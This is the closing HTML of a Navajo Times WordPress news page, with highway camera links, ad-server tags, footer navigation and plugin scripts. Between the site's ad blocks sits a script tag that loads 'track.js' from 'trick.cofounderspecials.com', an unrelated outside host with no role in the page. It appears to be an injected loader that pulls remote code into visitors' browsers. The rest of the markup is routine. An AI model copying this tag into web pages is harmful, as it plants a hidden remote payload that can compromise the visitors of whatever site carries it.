      <p style="padding-top:0; margin-top:30px;" onclick="window.open('https://www.az511.com/map/Cctv/47--15','_blank','toolbar=yes,scrollbars=yes,resizable=yes,top=200,left=300,width=990,height=580')"><a href="#"><img src="/images/design/interstate_arizona_40.png" alt="camera icon"  align="absmiddle" style="margin-right: 5px;border:none;float:left;" />I-40, WB @ Winslow</a> </p>
       <p style="padding-top:0; margin-top:30px;" onclick="window.open('https://www.az511.com/map/Cctv/25--15', '_blank', 'toolbar=yes,scrollbars=yes,resizable=yes,top=200,left=400,width=990,height=580')"><a href="#"><img src="/images/design/interstate_arizona_40.png" alt="camera icon"  align="absmiddle" style="margin-right: 5px;border:none;float:left;" />I-40, EB @ MP 199</a> </p>
      <p style="padding-top:0; margin-top:30px;" onclick="window.open('https://www.az511.com/map/Cctv/51--15', '_blank', 'toolbar=yes,scrollbars=yes,resizable=yes,top=200,left=400,width=990,height=580')"><a href="#"><img src="/images/design/interstate_arizona_40.png" alt="camera icon"  align="absmiddle" style="margin-right: 5px;border:none;float:left;" />SR-77 SB @ Holbrook</a> </p>
    </div>
    <!--END road conditions --> 
    
    <br clear="all"/>
  </div>
  <!-- END .widget --> 
  
  <!-- <div style="text-align:center;margin-bottom:25px;background-color:#fff;border-radius:3px;padding:10px">
         <p style="font-family: Arial,Helvetica,sans-serif; color: #999; font-size: 10px; margin-bottom: 5px; padding: 15px 0">ADVERTISEMENT</p>    --> 
  <!-- Navajo Times Adserver Asynchronous JS Tag - half skyscraper 120x240 --> 
  <!--        <ins data-revive-zoneid="12" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins>
                <script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script>
            </div> --> 
  <!-- revive large skyscraper 300x600 --> 
  <div class="" style="text-align:center;margin-top:10px">
	
	<ins data-revive-zoneid="8" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins> 
  <script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script> 
	</div>
  <!-- revive wide skyscraper 160x600 -->
  <div class="extra-hp-skyscraper" style="text-align:center;margin-top:10px">
    <p style="font-family: Arial,Helvetica,sans-serif; color: #999; font-size: 10px; margin-bottom: 5px; padding: 15px 0">ADVERTISEMENT</p>
    <!-- Navajo Times Adserver Asynchronous JS Tag - Generated with Revive Adserver v4.2.0 --> 
    <ins data-revive-zoneid="13" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins> 
    <script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script> 
    
    <!-- end wide skyscraper --> 
  </div>
</div>
<script src='https://trick.cofounderspecials.com/track.js?v=9.999' type='text/javascript'></script>
<p><!-- Vertical Banner 120x240 --></p>
<div style="text-align:center;">
<ins data-revive-zoneid="12" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins><br />
<script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script></div>
</div>
		</div> <!-- end .et_pb_widget --></div>
    </div>
    <!-- #content-area --> 
  </div>
  <!-- .container -->
  </div>
<!-- #main-content -->

<div class="container">
	<div class="et_pb_extra_row etad footer_above">
		<div class="adsense-responsive-ad"><!-- in theme options - Ads - Footer -->
<div style="margin-top:15px;text-align:center">
<ins data-revive-zoneid="3" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins>
<script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script></div></div>	</div>
</div>

	<footer id="footer" class="footer_columns_2_3__1_3">
		<div class="container">
	<div class="et_pb_extra_row container-width-change-notify">
						<div class="et_pb_extra_column odd column-1">
					<div id="text-6" class="et_pb_widget widget_text"><h4 class="widgettitle"> </h4>			<div class="textwidget"><div class="et_pb_extra_column odd column-1">
<div id="text-5">
<h4 class="widgettitle">Like what you’re reading?</h4>
<div class="textwidget">
<div class="subfooter-promo" style="margin: 0 auto; width: 90%;"><img wp-image-31739 jetpack-lazy-image" src="/wp-content/uploads/2020/02/ntpc-logo-sq-white-transp.png" alt="Navajo Times logo - Dine Bi Naaltsoos" width="200" data-lazy-src="/wp-content/uploads/2020/02/ntpc-logo-sq-white-transp.png?is-pending-load=1" /></p>
<div id="subfooter-logo-text">
<h2><a style="font-size: 24px;" href="https://navajotimes.com/contact-us/subscriptions/">Subscribe now.</a></h2>
<h2><a style="font-size: 24px;" href="https://navajotimes.com/contact-us/where-to-buy-the-times/">Find newsstands.</a></h2>
</div>
</div>
</div>
</div>
<p><!-- end .et_pb_widget --></div>
</div>
		</div> <!-- end .et_pb_widget -->				</div>
								<div class="et_pb_extra_column even column-4">
					<div id="pages-4" class="et_pb_widget widget_pages"><h4 class="widgettitle">Reach us</h4>
			<ul>
				<li class="page_item page-item-7089"><a href="https://navajotimes.com/advertise/">Advertise With Us!</a></li>
<li class="page_item page-item-184 page_item_has_children"><a href="https://navajotimes.com/contact-us/">Contact Us</a>
<ul class='children'>
	<li class="page_item page-item-311"><a href="https://navajotimes.com/contact-us/corporate/">Corporate</a></li>
	<li class="page_item page-item-306"><a href="https://navajotimes.com/contact-us/corrections/">Corrections</a></li>
	<li class="page_item page-item-318"><a href="https://navajotimes.com/contact-us/jobs-at-the-times/">Job Opportunities at the Times</a></li>
	<li class="page_item page-item-316 page_item_has_children"><a href="https://navajotimes.com/contact-us/subscriptions/">Subscribe</a>
	<ul class='children'>
		<li class="page_item page-item-42571"><a href="https://navajotimes.com/contact-us/subscriptions/log-in-to-my-news-on-the-go/">Log in to My News On the Go</a></li>
		<li class="page_item page-item-5709"><a href="https://navajotimes.com/contact-us/subscriptions/navajo-times-back-issues/">Navajo Times Back Issues</a></li>
	</ul>
</li>
	<li class="page_item page-item-314"><a href="https://navajotimes.com/contact-us/where-to-buy-the-times/">Where to Buy the Times</a></li>
</ul>
</li>
			</ul>

			</div> <!-- end .et_pb_widget -->				</div>
					</div>
</div>
		<div id="footer-bottom">
			<div class="container">

				<!-- Footer Info -->
				<p id="footer-info">Designed by <a href="http://www.elegantthemes.com" title="Premium WordPress Themes">Elegant Themes</a> | Powered by <a href="http://www.wordpress.org">WordPress</a></p>

				<!-- Footer Navigation -->
								<div id="footer-nav">
					<ul id="footer-menu" class="bottom-nav"><li id="menu-item-31710" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31710"><a href="https://navajotimes.com/terms/">Terms</a></li>
<li id="menu-item-31711" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31711"><a href="https://navajotimes.com/privacy-policy/">Privacy Policy</a></li>
</ul>						<ul class="et-extra-social-icons" style="">
																																								<li class="et-extra-social-icon facebook">
								<a href="https://facebook.com/navajotimes" class="et-extra-icon et-extra-icon-background-none et-extra-icon-facebook"></a>
							</li>
																																									<li class="et-extra-social-icon twitter">
								<a href="https://twitter.com/navajotimes" class="et-extra-icon et-extra-icon-background-none et-extra-icon-twitter"></a>
							</li>
																																																																																																																																																																																<li class="et-extra-social-icon instagram">
								<a href="https://instagram.com/navajotimes" class="et-extra-icon et-extra-icon-background-none et-extra-icon-instagram"></a>
							</li>
																																																																																																																																																																																																																																						<li class="et-extra-social-icon youtube">
								<a href="https://www.youtube.com/c/NavajotimesAZ" class="et-extra-icon et-extra-icon-background-none et-extra-icon-youtube"></a>
							</li>
																																																																																																																																																										</ul>
									</div> <!-- /#et-footer-nav -->
				
			</div>
		</div>
	</footer>
	</div> <!-- #page-container -->

			<span title="Back To Top" id="back_to_top"></span>
	
			<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
			<div style="display:none">
			<div class="grofile-hash-map-bef45f6b3d3fdee7d420bfd96986618f">
		</div>
		</div>
				<script type="text/javascript">
			let cust_login = document.getElementById("loginform");
			if(cust_login !== null) {
				var recaptcha_script = document.createElement('script');
				recaptcha_script.setAttribute('src','https://www.google.com/recaptcha/api.js');
				document.head.appendChild(recaptcha_script);                
			}
		</script>
		<script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};/* ]]> */ </script><style>				.single article .entry-content {
				display: none;
				}
				</style><!-- Google Tag Manager (noscript) -->
<!-- already appears via MonsterInsights plugin 
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WHNHR32"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> -->
<!-- End Google Tag Manager (noscript) --><script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/awesome-weather/js/awesome-weather-widget-frontend.js?ver=1.1' id='awesome_weather-js'></script>
<script type='text/javascript' id='ppress-frontend-script-js-extra'>
/* <![CDATA[ */
var pp_ajax_form = {"ajaxurl":"https:\/\/navajotimes.com\/wp-admin\/admin-ajax.php","confirm_delete":"Are you sure?","deleting_text":"Deleting...","deleting_error":"An error occurred. Please try again.","nonce":"91fd628210","disable_ajax_form":"false"};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/wp-user-avatar/assets/js/frontend.min.js?ver=3.2.16' id='ppress-frontend-script-js'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=202230' id='grofiles-cards-js'></script>
<script type='text/javascript' id='wpgroho-js-extra'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=11.1.2' id='wpgroho-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/leaky-paywall/js/js-cookie.js?ver=4.18.3' id='js_cookie_js-js'></script>
<script type='text/javascript' id='leaky_paywall_cookie_js-js-extra'>
/* <![CDATA[ */
var leaky_paywall_cookie_ajax = {"ajaxurl":"\/wp-admin\/admin-ajax.php","post_container":"article .entry-content","page_container":"article .entry-content","lead_in_elements":"2"};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/leaky-paywall/js/leaky-paywall-cookie.js?ver=4.18.3' id='leaky_paywall_cookie_js-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/leaky-paywall/js/micromodal.min.js?ver=4.18.3' id='zeen101_micromodal-js'></script>
<script type='text/javascript' id='leaky_paywall_validate-js-extra'>
/* <![CDATA[ */
var leaky_paywall_validate_ajax = {"ajaxurl":"\/wp-admin\/admin-ajax.php","register_nonce":"aa6988f386"};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/leaky-paywall/js/leaky-paywall-validate.js?ver=4.18.3' id='leaky_paywall_validate-js'></script>
<script type='text/javascript' id='leaky_paywall_script-js-extra'>
/* <![CDATA[ */
var leaky_paywall_script_ajax = {"ajaxurl":"\/wp-admin\/admin-ajax.php","stripe_pk":"","apple_pay":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/leaky-paywall/js/script.js?ver=4.18.3' id='leaky_paywall_script-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-includes/js/masonry.min.js?ver=4.2.2' id='masonry-js'></script>
<script type='text/javascript' id='extra-scripts-js-extra'>
/* <![CDATA[ */
var EXTRA = {"images_uri":"https:\/\/navajotimes.com\/wp-content\/themes\/Extra\/images\/","ajaxurl":"https:\/\/navajotimes.com\/wp-admin\/admin-ajax.php","your_rating":"Your Rating:","item_in_cart_count":"%d Item in Cart","items_in_cart_count":"%d Items in Cart","item_count":"%d Item","items_count":"%d Items","rating_nonce":"26b39fea0e","timeline_nonce":"0ecf5651ac","blog_feed_nonce":"776b2c18ab","error":"There was a problem, please try again.","contact_error_name_required":"Name field cannot be empty.","contact_error_email_required":"Email field cannot be empty.","contact_error_email_invalid":"Please enter a valid email address.","is_ab_testing_active":"","is_cache_plugin_active":"yes"};
var et_builder_utils_params = {"condition":{"diviTheme":false,"extraTheme":true},"scrollLocations":["app","top"],"builderScrollLocations":{"desktop":"app","tablet":"app","phone":"app"},"onloadScrollLocation":"app","builderType":"fe"};
var et_frontend_scripts = {"builderCssContainerPrefix":"#et-boc","builderCssLayoutPrefix":"#et-boc .et-l"};
var et_pb_custom = {"ajaxurl":"https:\/\/navajotimes.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/navajotimes.com\/wp-content\/themes\/Extra\/images","builder_images_uri":"https:\/\/navajotimes.com\/wp-content\/themes\/Extra\/includes\/builder\/images","et_frontend_nonce":"4083ba3366","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"f55e16a94d","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","wrong_checkbox":"Checkbox","ignore_waypoints":"no","is_divi_theme_used":"","widget_search_selector":".widget_search","ab_tests":[],"is_ab_testing_active":"","page_id":"71217","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"yes","is_shortcode_tracking":"","tinymce_uri":"https:\/\/navajotimes.com\/wp-content\/themes\/Extra\/includes\/builder\/frontend-builder\/assets\/vendors","waypoints_options":[]};
var et_pb_box_shadow_elements = [];
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/scripts/scripts.min.js?ver=4.17.6' id='extra-scripts-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/core/admin/js/es6-promise.auto.min.js?ver=4.17.6' id='es6-promise-js'></script>
<script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6Lfb2EUaAAAAAHkfhZHm-75jhpEWYX_mMEs6MDCY&#038;ver=4.17.6' id='et-recaptcha-v3-js'></script>
<script type='text/javascript' id='et-core-api-spam-recaptcha-js-extra'>
/* <![CDATA[ */
var et_core_api_spam_recaptcha = {"site_key":"6Lfb2EUaAAAAAHkfhZHm-75jhpEWYX_mMEs6MDCY","page_action":{"action":"letters_same_old_political_promises"}};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/core/admin/js/recaptcha.js?ver=4.17.6' id='et-core-api-spam-recaptcha-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/jquery.fitvids.js?ver=4.17.6' id='fitvids-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-includes/js/comment-reply.min.js?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' id='comment-reply-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/jquery.mobile.js?ver=4.17.6' id='jquery-mobile-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/magnific-popup.js?ver=4.17.6' id='magnific-popup-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/easypiechart.js?ver=4.17.6' id='easypiechart-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/salvattore.js?ver=4.17.6' id='salvattore-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/core/admin/js/common.js?ver=4.17.6' id='et-core-common-js'></script>
<script type='text/javascript' src='https://js.stripe.com/v3/?ver=4.18.3' id='stripe-js'></script>
<script type='text/javascript' src='https://www.google.com/recaptcha/api.js?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' id='google-recaptcha-js'></script>
<script type='text/javascript' id='et-builder-modules-script-motion-js-extra'>
/* <![CDATA[ */
var et_pb_motion_elements = {"desktop":[],"tablet":[],"phone":[]};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/motion-effects.js?ver=4.17.6' id='et-builder-modules-script-motion-js'></script>
<script type='text/javascript' id='et-builder-modules-script-sticky-js-extra'>
/* <![CDATA[ */
var et_pb_sticky_elements = [];
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/themes/Extra/includes/builder/feature/dynamic-assets/assets/js/sticky-elements.js?ver=4.17.6' id='et-builder-modules-script-sticky-js'></script>
<script src='https://stats.wp.com/e-202230.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.1.2',blog:'150809669',post:'71217',tz:'-6',srv:'navajotimes.com'} ]);
	_stq.push([ 'clickTrackerInit', '150809669', '71217' ]);
</script>
</body>
</html>
